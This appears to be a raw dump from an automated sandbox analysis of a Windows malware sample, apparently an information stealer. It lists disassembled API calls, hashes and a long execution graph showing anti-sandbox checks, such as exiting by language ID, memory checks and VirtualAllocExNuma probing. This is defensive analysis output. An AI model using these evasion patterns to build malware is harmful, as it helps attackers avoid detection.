                                                                                    • Opcode Fuzzy Hash: d500ab467568cc089f2f810d33affd2ebfdf54b471f9d9af73e546eb9498b0b3
                                                                                    • Instruction Fuzzy Hash: 2BF0B4B2A0022836D2202A56BC41B92F7CC8F40B68F10443FFD04A7682EAF8A94541A8
                                                                                    APIs
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 009FDCDA
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009FDCE8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                    • String ID: 11@
                                                                                    • API String ID: 1687795959-1785270423
                                                                                    • Opcode ID: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                                                    • Instruction ID: 08507995d46092ae1eccb6071ef8e1b84aae51b4dd58495297ac7192c51f9226
                                                                                    • Opcode Fuzzy Hash: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                                                    • Instruction Fuzzy Hash: 27F0E9397005195BCB04EB59DC85C6DF7ADAF85B613110076FA42D3352DBB4ED058794
                                                                                    APIs
                                                                                    • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,0043A95A,?,00000055,00000050), ref: 00435294
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: DefaultUser
                                                                                    • String ID: 11@$GetUserDefaultLocaleName
                                                                                    • API String ID: 3358694519-96072240
                                                                                    • Opcode ID: 16a0718fbd455e8dc7f79371a647250a910ba3e014e61bb6336f7cb34782cdd6
                                                                                    • Instruction ID: 56ecbbb9c6e0ea3c164d002f9608a712f4b6e8dd4fbc805ea42157dacaae974e
                                                                                    • Opcode Fuzzy Hash: 16a0718fbd455e8dc7f79371a647250a910ba3e014e61bb6336f7cb34782cdd6
                                                                                    • Instruction Fuzzy Hash: 3DF02431A80208BBDB10AF51CC03F9E7F50EB09B50F10416AFD046A291DAB95E209ACD
                                                                                    APIs
                                                                                    • IsValidLocale.KERNEL32(00000000,00430853,00000000,00000001,?,?,00430853,?,?,00430233,?,00000004), ref: 0043535F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: LocaleValid
                                                                                    • String ID: 11@$IsValidLocaleName
                                                                                    • API String ID: 1901932003-3041995494
                                                                                    • Opcode ID: ec0c667621164707c1bc2b991c274cf4e18bf7ac853b3eeeb1e3ed5b34663cf6
                                                                                    • Instruction ID: 92ee9c0e94e9f2fbea2cc18d2d1159cfcb308c2a760149ff5b58bb71b949f05c
                                                                                    • Opcode Fuzzy Hash: ec0c667621164707c1bc2b991c274cf4e18bf7ac853b3eeeb1e3ed5b34663cf6
                                                                                    • Instruction Fuzzy Hash: 94F02430A84708B7DB10AB108D07B9EBB549B48B12F10403ABD0066281CAF95911A59D
                                                                                    APIs
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0043255D,-00000020,00000FA0,00000000,00000014,00402866), ref: 004352FC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                    • String ID: 11@$InitializeCriticalSectionEx
                                                                                    • API String ID: 2593887523-3358978645
                                                                                    • Opcode ID: 4941b3bd5492a3ccd0429f2016fdf03f36fccdd9fbf1eb1f29f14e59228ea09c
                                                                                    • Instruction ID: 2051ed9e425ee247f5129d915950feebf7d6a3be7f43922744b44a15a137ba2f
                                                                                    • Opcode Fuzzy Hash: 4941b3bd5492a3ccd0429f2016fdf03f36fccdd9fbf1eb1f29f14e59228ea09c
                                                                                    • Instruction Fuzzy Hash: 2FF0B431A40208BBDB11AF51DD02D9F7F61EB08B51F10406AFD0556260DABA4E20EAC9
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_catch
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 3886170330-2084237596
                                                                                    • Opcode ID: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                                                    • Instruction ID: 34e8bc77d22ddcdafc14714ce60d9b0db4004f50fe154a236d7873180d633bee
                                                                                    • Opcode Fuzzy Hash: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                                                    • Instruction Fuzzy Hash: 83F06274600124DFDB22AF65D40159D7BB0AF41748F8640EBF5045B3A1C77C6D54CFAA
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free
                                                                                    • String ID: 11@$FlsFree
                                                                                    • API String ID: 3978063606-2352678666
                                                                                    • Opcode ID: 6dffc1cdda050d1ef236ec52a9cd275bb2632aad14ca1d18400e2b4c69ec58df
                                                                                    • Instruction ID: c1727abd3399064533d4b72406d339915fd92446a3417b7bd4380397cab03c3a
                                                                                    • Opcode Fuzzy Hash: 6dffc1cdda050d1ef236ec52a9cd275bb2632aad14ca1d18400e2b4c69ec58df
                                                                                    • Instruction Fuzzy Hash: 0FE0E532F41218ABD714AF559C07A6EBB60DB48F15F14017BFE0557281DA794E1096CE
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Alloc
                                                                                    • String ID: 11@$FlsAlloc
                                                                                    • API String ID: 2773662609-288891599
                                                                                    • Opcode ID: ba89461f714ec2f353eb854be2fff552b03e75bb0e63386cb5f1b0964f268f00
                                                                                    • Instruction ID: 656933edcbb05ac72b6cf25421a562d2aaaa3326236b7023487c433eafd234ee
                                                                                    • Opcode Fuzzy Hash: ba89461f714ec2f353eb854be2fff552b03e75bb0e63386cb5f1b0964f268f00
                                                                                    • Instruction Fuzzy Hash: 62E05C30B8170477D314AF518C03A6EB760DB0AB11F10017BFC0127280DDBD5E1085CE
                                                                                    APIs
                                                                                    • try_get_function.LIBVCRUNTIME ref: 00429FDA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: try_get_function
                                                                                    • String ID: 11@$FlsAlloc
                                                                                    • API String ID: 2742660187-288891599
                                                                                    • Opcode ID: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                                                    • Instruction ID: 02976f814a59a294967572ff2c8846d3634fef9e4185a681c56ac9216c02fddb
                                                                                    • Opcode Fuzzy Hash: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                                                    • Instruction Fuzzy Hash: BDD0C231BC973663D5406B816D02B99BA048701FA3F110063F90CA1281D6994A1046CD
                                                                                    APIs
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212FB
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00421309
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                    • String ID: pThreadProxy
                                                                                    • API String ID: 1687795959-3651400591
                                                                                    • Opcode ID: d978fa9c7b04847c80681c11cf36977db16e70b896a80dd6198ffb22ffb34018
                                                                                    • Instruction ID: 5420a3ac49ee2b21aafe02425b7e31d130dadcb6d03c7143bde2fe2a0427303a
                                                                                    • Opcode Fuzzy Hash: d978fa9c7b04847c80681c11cf36977db16e70b896a80dd6198ffb22ffb34018
                                                                                    • Instruction Fuzzy Hash: 8FD05B71E0020896D700EBB9D806E4E77A85B10718F50417B7D14E6147DF78E508C6A8
                                                                                    APIs
                                                                                    • Concurrency::details::ContextBase::CancellationBeaconStack::~CancellationBeaconStack.LIBCONCRT ref: 0041A8A1
                                                                                    • Hash.LIBCONCRT ref: 0041A8AE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: BeaconCancellation$Base::Concurrency::details::ContextHashStackStack::~
                                                                                    • String ID: +hB
                                                                                    • API String ID: 3232699325-4272926976
                                                                                    • Opcode ID: 7ad862fe756be090a11e09584eb2edb8185e7db7bb7af1f5538142d7ac1213cc
                                                                                    • Instruction ID: 63ff50f5f99ebaa442bb0d4aeec8a7224868785c63155d6932f4acb55241cc7c
                                                                                    • Opcode Fuzzy Hash: 7ad862fe756be090a11e09584eb2edb8185e7db7bb7af1f5538142d7ac1213cc
                                                                                    • Instruction Fuzzy Hash: 2DD0A73230451156C708772AF8019C9F761BF80710B11403FE455935518F3838AF869D
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: CommandLine
                                                                                    • String ID: `%~
                                                                                    • API String ID: 3253501508-3906510574
                                                                                    • Opcode ID: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
                                                                                    • Instruction ID: a72b382a13dd36543230f851506b27d64c175e456db285366795c2c72c230a95
                                                                                    • Opcode Fuzzy Hash: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
                                                                                    • Instruction Fuzzy Hash: 15B0487C8003008BC7108F28AA081043AA0BA0BA0338002B5D4099233AD734A1008E08
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,f(@,00000000), ref: 0042AF40
                                                                                    • GetLastError.KERNEL32 ref: 0042AF4E
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AFA9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1717984340-0
                                                                                    • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                    • Instruction ID: 120bd2143bdce8d71afc71d227a82de2ececf14487395c5eb9abd3a2316ebb2c
                                                                                    • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                    • Instruction Fuzzy Hash: 00414830700621EFCF228F66E944B6BBBA4EF01714F95416BFC699B290D7388D01C79A
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,009E2ACD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,009E2ACD,00000000), ref: 00A0B1A7
                                                                                    • GetLastError.KERNEL32 ref: 00A0B1B5
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,009E2ACD,00000000), ref: 00A0B210
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1717984340-0
                                                                                    • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                    • Instruction ID: 7abf3d8db3c7e02363c666045a5ac928c6fc794baf52ed2edc702ba323c8996b
                                                                                    • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                    • Instruction Fuzzy Hash: 0541C275A1020AEFCF218F64EA946BE7BA4EF16711F154269E859A71E1DB308D01CB70

                                                                                    Execution Graph

Execution Coverage: 6.6%
Dynamic/Decrypted Code Coverage: 4.7%
Signature Coverage: 1%
Total number of Nodes: 1415
Total number of Limit Nodes: 28
                                                                                    execution_graph 27605 409440 strlen malloc strcpy_s free std::exception::exception 27663 2d230d0 9 API calls 27666 41ce48 LeaveCriticalSection _raise 27667 2d23823 9 API calls 27608 41b050 6 API calls 3 library calls 27643 2d213c7 strtok_s strtok_s 27670 2d2102b StrCmpCA strtok_s 27704 406f60 memcpy 27614 41dc60 atexit 27705 410765 279 API calls 27672 417667 lstrcpy 27673 2d230f9 7 API calls 27674 41b270 5 API calls 2 library calls 27711 2d219e7 StrCmpCA ExitProcess strtok_s StrCmpCA strtok_s 27712 2d235e4 9 API calls 27676 2d2cce9 162 API calls getSystemCP 27617 2d2ae93 43 API calls ctype 27618 2d20297 149 API calls 27620 41bc11 71 API calls 2 library calls 27677 2d23823 6 API calls 27713 2d2118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27678 2d2102b StrCmpCA StrCmpCA strtok_s 27714 2d2cd8f 6 API calls 2 library calls 27680 2d20cb6 30 API calls 27681 2d204b7 88 API calls 27624 2d16ebc VirtualProtect 27625 41ac2c 71 API calls ctype 27716 2d2cd90 173 API calls 3 library calls 27626 2d232ae 22 API calls 27684 2d2d0af RtlLeaveCriticalSection _raise 27685 2d2140b strtok_s 27627 4090c3 5 API calls allocator 27687 2d26c57 690 API calls 27718 2d26d18 644 API calls 27688 2d2102b StrCmpCA strtok_s lstrlen lstrcpy 27629 2d23b7d 91 API calls 2 library calls 27720 41abd0 free std::exception::_Tidy ctype 27630 2d26a40 6 API calls 27721 413916 91 API calls 2 library calls 27722 4183dc 15 API calls 27631 2d2cd97 170 API calls 2 library calls 27632 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 27633 2d2be78 162 API calls 2 library calls 27692 41ceea SetUnhandledExceptionFilter 26145 4169f0 26188 402260 26145->26188 26162 417850 3 API calls 26163 416a30 26162->26163 26164 4178e0 3 API calls 26163->26164 26165 416a43 26164->26165 26321 41a9b0 26165->26321 26167 416a64 26168 41a9b0 4 API calls 26167->26168 26169 416a6b 26168->26169 26170 41a9b0 4 API calls 26169->26170 26171 416a72 
26170->26171 26172 41a9b0 4 API calls 26171->26172 26173 416a79 26172->26173 26174 41a9b0 4 API calls 26173->26174 26175 416a80 26174->26175 26329 41a8a0 26175->26329 26177 416b0c 26333 416920 GetSystemTime 26177->26333 26178 416a89 26178->26177 26180 416ac2 OpenEventA 26178->26180 26183 416af5 CloseHandle Sleep 26180->26183 26184 416ad9 26180->26184 26186 416b0a 26183->26186 26187 416ae1 CreateEventA 26184->26187 26185 416b16 CloseHandle ExitProcess 26186->26178 26187->26177 26530 4045c0 17 API calls 26188->26530 26190 402274 26191 4045c0 34 API calls 26190->26191 26192 40228d 26191->26192 26193 4045c0 34 API calls 26192->26193 26194 4022a6 26193->26194 26195 4045c0 34 API calls 26194->26195 26196 4022bf 26195->26196 26197 4045c0 34 API calls 26196->26197 26198 4022d8 26197->26198 26199 4045c0 34 API calls 26198->26199 26200 4022f1 26199->26200 26201 4045c0 34 API calls 26200->26201 26202 40230a 26201->26202 26203 4045c0 34 API calls 26202->26203 26204 402323 26203->26204 26205 4045c0 34 API calls 26204->26205 26206 40233c 26205->26206 26207 4045c0 34 API calls 26206->26207 26208 402355 26207->26208 26209 4045c0 34 API calls 26208->26209 26210 40236e 26209->26210 26211 4045c0 34 API calls 26210->26211 26212 402387 26211->26212 26213 4045c0 34 API calls 26212->26213 26214 4023a0 26213->26214 26215 4045c0 34 API calls 26214->26215 26216 4023b9 26215->26216 26217 4045c0 34 API calls 26216->26217 26218 4023d2 26217->26218 26219 4045c0 34 API calls 26218->26219 26220 4023eb 26219->26220 26221 4045c0 34 API calls 26220->26221 26222 402404 26221->26222 26223 4045c0 34 API calls 26222->26223 26224 40241d 26223->26224 26225 4045c0 34 API calls 26224->26225 26226 402436 26225->26226 26227 4045c0 34 API calls 26226->26227 26228 40244f 26227->26228 26229 4045c0 34 API calls 26228->26229 26230 402468 26229->26230 26231 4045c0 34 API calls 26230->26231 26232 402481 26231->26232 26233 4045c0 34 API calls 26232->26233 26234 40249a 26233->26234 26235 4045c0 34 API calls 
26234->26235 26236 4024b3 26235->26236 26237 4045c0 34 API calls 26236->26237 26238 4024cc 26237->26238 26239 4045c0 34 API calls 26238->26239 26240 4024e5 26239->26240 26241 4045c0 34 API calls 26240->26241 26242 4024fe 26241->26242 26243 4045c0 34 API calls 26242->26243 26244 402517 26243->26244 26245 4045c0 34 API calls 26244->26245 26246 402530 26245->26246 26247 4045c0 34 API calls 26246->26247 26248 402549 26247->26248 26249 4045c0 34 API calls 26248->26249 26250 402562 26249->26250 26251 4045c0 34 API calls 26250->26251 26252 40257b 26251->26252 26253 4045c0 34 API calls 26252->26253 26254 402594 26253->26254 26255 4045c0 34 API calls 26254->26255 26256 4025ad 26255->26256 26257 4045c0 34 API calls 26256->26257 26258 4025c6 26257->26258 26259 4045c0 34 API calls 26258->26259 26260 4025df 26259->26260 26261 4045c0 34 API calls 26260->26261 26262 4025f8 26261->26262 26263 4045c0 34 API calls 26262->26263 26264 402611 26263->26264 26265 4045c0 34 API calls 26264->26265 26266 40262a 26265->26266 26267 4045c0 34 API calls 26266->26267 26268 402643 26267->26268 26269 4045c0 34 API calls 26268->26269 26270 40265c 26269->26270 26271 4045c0 34 API calls 26270->26271 26272 402675 26271->26272 26273 4045c0 34 API calls 26272->26273 26274 40268e 26273->26274 26275 419860 26274->26275 26534 419750 GetPEB 26275->26534 26277 419868 26278 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26277->26278 26279 41987a 26277->26279 26280 419af4 GetProcAddress 26278->26280 26281 419b0d 26278->26281 26284 41988c 21 API calls 26279->26284 26280->26281 26282 419b46 26281->26282 26283 419b16 GetProcAddress GetProcAddress 26281->26283 26285 419b68 26282->26285 26286 419b4f GetProcAddress 26282->26286 26283->26282 26284->26278 26287 419b71 GetProcAddress 26285->26287 26288 419b89 26285->26288 26286->26285 26287->26288 26289 416a00 26288->26289 26290 419b92 GetProcAddress GetProcAddress 26288->26290 26291 41a740 26289->26291 26290->26289 26292 41a750 26291->26292 
26293 416a0d 26292->26293 26294 41a77e lstrcpy 26292->26294 26295 4011d0 26293->26295 26294->26293 26296 4011e8 26295->26296 26297 401217 26296->26297 26298 40120f ExitProcess 26296->26298 26299 401160 GetSystemInfo 26297->26299 26300 401184 26299->26300 26301 40117c ExitProcess 26299->26301 26302 401110 GetCurrentProcess VirtualAllocExNuma 26300->26302 26303 401141 ExitProcess 26302->26303 26304 401149 26302->26304 26535 4010a0 VirtualAlloc 26304->26535 26307 401220 26539 4189b0 26307->26539 26310 401249 __aulldiv 26311 40129a 26310->26311 26312 401292 ExitProcess 26310->26312 26313 416770 GetUserDefaultLangID 26311->26313 26314 4167d3 GetUserDefaultLCID 26313->26314 26315 416792 26313->26315 26314->26162 26315->26314 26316 4167c1 ExitProcess 26315->26316 26317 4167a3 ExitProcess 26315->26317 26318 4167b7 ExitProcess 26315->26318 26319 4167cb ExitProcess 26315->26319 26320 4167ad ExitProcess 26315->26320 26541 41a710 26321->26541 26323 41a9c1 lstrlenA 26325 41a9e0 26323->26325 26324 41aa18 26542 41a7a0 26324->26542 26325->26324 26327 41a9fa lstrcpy lstrcatA 26325->26327 26327->26324 26328 41aa24 26328->26167 26330 41a8bb 26329->26330 26331 41a90b 26330->26331 26332 41a8f9 lstrcpy 26330->26332 26331->26178 26332->26331 26546 416820 26333->26546 26335 41698e 26336 416998 sscanf 26335->26336 26575 41a800 26336->26575 26338 4169aa SystemTimeToFileTime SystemTimeToFileTime 26339 4169e0 26338->26339 26340 4169ce 26338->26340 26342 415b10 26339->26342 26340->26339 26341 4169d8 ExitProcess 26340->26341 26343 415b1d 26342->26343 26344 41a740 lstrcpy 26343->26344 26345 415b2e 26344->26345 26577 41a820 lstrlenA 26345->26577 26348 41a820 2 API calls 26349 415b64 26348->26349 26350 41a820 2 API calls 26349->26350 26351 415b74 26350->26351 26581 416430 26351->26581 26354 41a820 2 API calls 26355 415b93 26354->26355 26356 41a820 2 API calls 26355->26356 26357 415ba0 26356->26357 26358 41a820 2 API calls 26357->26358 26359 415bad 26358->26359 26360 41a820 2 API calls 26359->26360 
26361 415bf9 26360->26361 26590 4026a0 26361->26590 26369 415cc3 26370 416430 lstrcpy 26369->26370 26371 415cd5 26370->26371 26372 41a7a0 lstrcpy 26371->26372 26373 415cf2 26372->26373 26374 41a9b0 4 API calls 26373->26374 26375 415d0a 26374->26375 26376 41a8a0 lstrcpy 26375->26376 26377 415d16 26376->26377 26378 41a9b0 4 API calls 26377->26378 26379 415d3a 26378->26379 26380 41a8a0 lstrcpy 26379->26380 26381 415d46 26380->26381 26382 41a9b0 4 API calls 26381->26382 26383 415d6a 26382->26383 26384 41a8a0 lstrcpy 26383->26384 26385 415d76 26384->26385 26386 41a740 lstrcpy 26385->26386 26387 415d9e 26386->26387 27316 417500 GetWindowsDirectoryA 26387->27316 26390 41a7a0 lstrcpy 26391 415db8 26390->26391 27326 404880 26391->27326 26393 415dbe 27472 4117a0 26393->27472 26395 415dc6 26396 41a740 lstrcpy 26395->26396 26397 415de9 26396->26397 26398 401590 lstrcpy 26397->26398 26399 415dfd 26398->26399 27492 405960 39 API calls ctype 26399->27492 26401 415e03 27493 411050 strtok_s strtok_s lstrlenA lstrcpy 26401->27493 26403 415e0e 26404 41a740 lstrcpy 26403->26404 26405 415e32 26404->26405 26406 401590 lstrcpy 26405->26406 26407 415e46 26406->26407 27494 405960 39 API calls ctype 26407->27494 26409 415e4c 27495 410d90 7 API calls 26409->27495 26411 415e57 26412 41a740 lstrcpy 26411->26412 26413 415e79 26412->26413 26414 401590 lstrcpy 26413->26414 26415 415e8d 26414->26415 27496 405960 39 API calls ctype 26415->27496 26417 415e93 27497 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26417->27497 26419 415e9e 26420 401590 lstrcpy 26419->26420 26421 415eb5 26420->26421 27498 411a10 121 API calls 26421->27498 26423 415eba 26424 41a740 lstrcpy 26423->26424 26425 415ed6 26424->26425 27499 404fb0 8 API calls 26425->27499 26427 415edb 26428 401590 lstrcpy 26427->26428 26429 415f5b 26428->26429 27500 410740 292 API calls 26429->27500 26431 415f60 26432 41a740 lstrcpy 26431->26432 26433 415f86 26432->26433 26434 401590 lstrcpy 26433->26434 26435 415f9a 26434->26435 27501 
405960 39 API calls ctype 26435->27501 26437 415fa0 27502 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26437->27502 26439 415fab 26440 401590 lstrcpy 26439->26440 26441 415feb 26440->26441 27503 401e80 67 API calls 26441->27503 26443 415ff0 26444 416000 26443->26444 26445 416092 26443->26445 26446 41a740 lstrcpy 26444->26446 26447 41a7a0 lstrcpy 26445->26447 26449 416020 26446->26449 26448 4160a5 26447->26448 26450 401590 lstrcpy 26448->26450 26451 401590 lstrcpy 26449->26451 26452 4160b9 26450->26452 26453 416034 26451->26453 27507 405960 39 API calls ctype 26452->27507 27504 405960 39 API calls ctype 26453->27504 26456 4160bf 27508 413560 36 API calls 26456->27508 26457 41603a 27505 4112d0 21 API calls ctype 26457->27505 26460 41608a 26463 41610b 26460->26463 26466 401590 lstrcpy 26460->26466 26461 416045 26462 401590 lstrcpy 26461->26462 26464 416085 26462->26464 26465 416130 26463->26465 26468 401590 lstrcpy 26463->26468 27506 413dc0 75 API calls 26464->27506 26469 416155 26465->26469 26472 401590 lstrcpy 26465->26472 26470 4160e7 26466->26470 26471 41612b 26468->26471 26474 41617a 26469->26474 26479 401590 lstrcpy 26469->26479 27509 4140b0 64 API calls ctype 26470->27509 27511 414780 116 API calls ctype 26471->27511 26477 416150 26472->26477 26475 41619f 26474->26475 26481 401590 lstrcpy 26474->26481 26486 401590 lstrcpy 26475->26486 26501 4161c4 26475->26501 27512 414bb0 67 API calls ctype 26477->27512 26478 4160ec 26483 401590 lstrcpy 26478->26483 26480 416175 26479->26480 27513 414d70 75 API calls 26480->27513 26485 41619a 26481->26485 26487 416106 26483->26487 27514 414f40 69 API calls ctype 26485->27514 26490 4161bf 26486->26490 27510 415100 71 API calls 26487->27510 26488 401590 lstrcpy 26492 4161e4 26488->26492 27515 407710 125 API calls ctype 26490->27515 27516 415050 67 API calls ctype 26492->27516 26493 401590 lstrcpy 26498 416209 26493->26498 26494 416220 26500 41a740 lstrcpy 26494->26500 26495 4162b3 26499 41a7a0 lstrcpy 26495->26499 27517 
419010 54 API calls ctype 26498->27517 26504 4162c6 26499->26504 26505 416241 26500->26505 26501->26488 26502 4161e9 26501->26502 26502->26493 26506 416210 26502->26506 26507 401590 lstrcpy 26504->26507 26508 401590 lstrcpy 26505->26508 26506->26494 26506->26495 26510 4162da 26507->26510 26509 416255 26508->26509 27518 405960 39 API calls ctype 26509->27518 27521 405960 39 API calls ctype 26510->27521 26513 41625b 27519 4112d0 21 API calls ctype 26513->27519 26514 4162e0 27522 413560 36 API calls 26514->27522 26517 4162ab 26520 41a7a0 lstrcpy 26517->26520 26518 416266 26519 401590 lstrcpy 26518->26519 26521 4162a6 26519->26521 26522 4162fc 26520->26522 27520 413dc0 75 API calls 26521->27520 26524 401590 lstrcpy 26522->26524 26525 416310 26524->26525 27523 405960 39 API calls ctype 26525->27523 26527 41631c 26529 416338 26527->26529 27524 416630 9 API calls ctype 26527->27524 26529->26185 26531 404697 26530->26531 26532 4046ac 11 API calls 26531->26532 26533 40474f 6 API calls 26531->26533 26532->26531 26533->26190 26534->26277 26536 4010c2 ctype 26535->26536 26537 4010fd 26536->26537 26538 4010e2 VirtualFree 26536->26538 26537->26307 26538->26537 26540 401233 GlobalMemoryStatusEx 26539->26540 26540->26310 26541->26323 26543 41a7c2 26542->26543 26544 41a7ec 26543->26544 26545 41a7da lstrcpy 26543->26545 26544->26328 26545->26544 26547 41a740 lstrcpy 26546->26547 26548 416833 26547->26548 26549 41a9b0 4 API calls 26548->26549 26550 416845 26549->26550 26551 41a8a0 lstrcpy 26550->26551 26552 41684e 26551->26552 26553 41a9b0 4 API calls 26552->26553 26554 416867 26553->26554 26555 41a8a0 lstrcpy 26554->26555 26556 416870 26555->26556 26557 41a9b0 4 API calls 26556->26557 26558 41688a 26557->26558 26559 41a8a0 lstrcpy 26558->26559 26560 416893 26559->26560 26561 41a9b0 4 API calls 26560->26561 26562 4168ac 26561->26562 26563 41a8a0 lstrcpy 26562->26563 26564 4168b5 26563->26564 26565 41a9b0 4 API calls 26564->26565 26566 4168cf 26565->26566 26567 41a8a0 lstrcpy 
[Control-flow graph: the raw node/edge export is omitted here. It lists each basic block as "<node id> <address> [API names]" and each edge as "<id>-><id>". The API-bearing nodes recoverable from it, by address:]
